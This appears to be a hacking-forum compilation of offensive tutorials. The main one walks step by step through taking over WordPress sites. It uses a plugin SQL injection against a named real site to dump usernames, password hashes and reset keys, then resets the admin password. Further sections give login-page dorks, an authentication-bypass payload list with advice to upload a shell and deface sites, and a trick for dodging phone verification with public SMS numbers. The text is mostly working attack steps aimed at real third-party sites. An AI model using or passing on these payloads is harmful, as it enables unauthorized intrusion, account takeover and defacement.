Hacking Wordpress Without Hash Cracking


The title says am going to show u how to hack a wordpress site without cracking the hashes.Now this works with all the wordpress sqli exploits ever posted in any of its themes or plugins.
Point to remember: 
You cannot exploit the latest version of wordpress with this [3.4.2] which was released on 6th -september 2012 yea u heard it right released this month now there are still tons of websites out there which haven't been updated yet all the previous version can be exploited using this method ..
Things u need
1) any wordpress sqli dork .. (u can get it from exploit-db.com)
2) knowledge of sqli .. (coz this thread is not about sqli)
3) my help .. hehe

1) My Dork

There are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect..
and the google dork for it is.
Code:
inurl:"/?fbconnect_action=myhome"

Now paste this code in google.com (one of my best frnds) and u will see no. of vulnerable websites.
2) Now the website im going to use here is
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2

Here the parameter userid is vulnerable to sqli. So lets see what we can get from the data base.Im going to change the above URL with this :
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email)​,7,8,9,10,11,12+from+wp_users--

Now u can see we got the username with the email id
Now if i change the above URL to this :
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),​7,8,9,10,11,12+from+wp_users--

Im going to get the user name and the hashed password
Point to be noted here :  Im using concat here .. u can also use group_concat to get all the users again that would be ur knowledge how u use sqli.
Now we all know that wordpress hashes belong to the category MD5(wordpress)(different from simple MD5) and are very hard to crack but if ur mad u should think out of the box
So now follow the steps
a) Go to the login page of of wordpress site .. in my case that would be.
Code:
http://masaru.ikeda.me/wp-login.php
 b) Click on Lost your password ?
c) Now the wordpress will ask me for the username or email for which i want to reset the password in my case that is 'masaru' so go ahead and enter the username .

d) Now look closely it says "Check your e-mail for the confirmation link."
e) Now what wordpress does actually it sends an activation key to the email address of that user and it sets the value of activation key in the database aswell what u have to do is just to get that key .. 
f) So now im going to change my URL to this to get the activation key
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa​tion_key),7,8,9,10,11,12+from+wp_users--

And u can see we got the activation key here u should note it down somewhere.
g) Now finally all we have to do is without going to the email address reset the password for that im going to add this to my URL .
Code:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

And im going to replace the KEYHERE with the activation key i got and the USERNAME HERE with the username which in my case is 'masaru' so my URL will be :
Code:
http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru

The wordpress will ask u for ur new password
Now go the login page again and try the new password and there u go u got access to the panel
WANT TO KNOW THE VERSION OF WORD PRESS ?
Now to chk quickly if a website is using the latest version 3.4.2 or previous versions goto the login page and see if there is an option there to go back to the main page of the blog like in my case see the option : like in my case see the option : -- Back to Digital Way of Living then this is not 3.4.2 if u don't see this option .. then it is 3.4.2 this trick is not legit i figured it out and is working for me :
Hope you will like this .. : ) 
IT WORKS PERFECT FOR ME CHECK OUT :
Hacked WordPress site : http://standzahra.id1945.com/

HACK WEBSITE'S ADMIN PANEL USING BASIC SQL INJECTION

You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection). I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.

inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx


Try to make your own dorks also to get more success rate :

Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1
Use the above mentioned login details and you will be into the admin panel of a website. It will not work for all the websites you will find, but will work on most of the websites.

Other InjecTion Queries:

‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)


100 % Working Bypass Mobile Number Verification in Gmail,Fb,Yahoo,etc

First of all , Visit this website.

http://receive-sms-online.com/

In that website You can find some numbers.
Choose one number & click it.
Then Copy that mobile number & put that mobile number wherever verification code asks !!
Finally , u will receive verification code in that website..
Thats it !!!

This method will be very useful while u r creating a new accounts like gmail,yahoo,etc.
This will receive almost all Verification Codes !!
Hope it will works fine ...